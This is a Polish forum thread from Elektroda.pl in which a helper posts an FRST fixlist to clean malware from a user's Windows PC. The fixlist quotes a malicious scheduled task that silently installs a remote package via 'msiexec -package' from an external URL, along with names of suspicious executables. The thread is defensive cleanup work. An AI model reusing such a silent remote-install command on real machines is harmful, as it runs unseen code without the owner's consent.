Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

[Rozwiązano] Proszę o sprawdzenie loga z FRST

maniekk89 21 Lis 2018 18:02 51 3
  • Pomocny post
    #2 21 Lis 2018 18:11
    Kolobos
    Spec od komputerów

    Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {0D1816D2-DE96-47B9-87CD-5E736FD6F4B6} - System32\Tasks\{2B5018F3-8D69-2BBE-FB90-A374DB24BA37} => C:\Users\Maniek\AppData\Local\Programs\Opera\Launcher.exe [2018-11-14] (Opera Software)
    Task: {10256836-E322-4DD7-B785-E4CB2AECE97B} - System32\Tasks\{04240ED5-9374-4B83-B838-EB71F3130BBB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Maniek\Desktop\seba86mu ModPack.exe" -d C:\Users\Maniek\Desktop
    C:\Program Files (x86)\Common Files\QaUIIDZYYO.exe
    Task: {5F5265B3-0F0B-4B1F-AA3C-645C60162B3F} - System32\Tasks\{0B29A393-6A9C-1C71-9522-297FC057299B} => C:\Program Files (x86)\Common Files\QaUIIDZYYO.exe [2009-07-14] (Microsoft Corporation)
    Task: {A50028E0-AC67-45E7-B48F-544D95FB95BB} - System32\Tasks\{8683AF5A-2F39-3CF4-BCE0-91986746872E} => "msiexec" -package hxxps://faremler.com/erlbldkudlze.znv /q
    Task: {F7EF6335-647A-4943-8F62-AAD432CDF420} - System32\Tasks\Opera scheduled Autoupdate 1536688796 => C:\Users\Maniek\AppData\Local\Programs\Opera\launcher.exe [2018-11-14] (Opera Software)
    2018-11-21 15:58 - 2018-11-21 16:17 - 000000000 ____D C:\AdwCleaner
    2018-11-20 20:17 - 2018-11-20 20:18 - 006161408 _____ C:\Users\Maniek\AppData\Local\dump007.dat
    2018-11-20 20:12 - 2018-11-20 20:12 - 000003762 _____ C:\Windows\System32\Tasks\{2B5018F3-8D69-2BBE-FB90-A374DB24BA37}
    2018-11-20 20:12 - 2018-11-20 20:12 - 000003584 _____ C:\Windows\System32\Tasks\{8683AF5A-2F39-3CF4-BCE0-91986746872E}
    2018-11-20 20:12 - 2018-11-20 20:12 - 000003458 _____ C:\Windows\System32\Tasks\{0B29A393-6A9C-1C71-9522-297FC057299B}
    2018-11-20 20:12 - 2018-11-20 20:12 - 000000002 _____ C:\Users\Maniek\AppData\Local\imw.ini
    2009-07-14 02:14 - 2009-07-14 02:14 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\QaUIIDZYYO.exe
    2009-07-14 02:14 - 2009-07-14 02:14 - 000073216 ____N (Microsoft Corporation) C:\Users\Maniek\AppData\Roaming\PMSAg.exe
    2018-11-20 20:17 - 2018-11-20 20:18 - 006161408 _____ () C:\Users\Maniek\AppData\Local\dump007.dat
    2018-11-20 20:12 - 2018-11-20 20:12 - 000000002 _____ () C:\Users\Maniek\AppData\Local\imw.ini
    2018-11-04 22:49 - 2018-11-04 22:49 - 000000000 _____ () C:\Users\Maniek\AppData\Local\{74C319A2-4247-4A58-96FF-E9D2579FC700}

    Po wykonaniu usun katlaog C:\FRST.

    0
  • #3 21 Lis 2018 18:20
    maniekk89
    Poziom 2  

    Dzięki! już myślałem że tylko format :P

    0
  • #4 21 Lis 2018 18:58
    maniekk89
    Poziom 2  

    Dzięki! już myślałem że tylko format :P

    Dodano po 38 [minuty]:

    Dzięki pomocy Kolobos'a

    0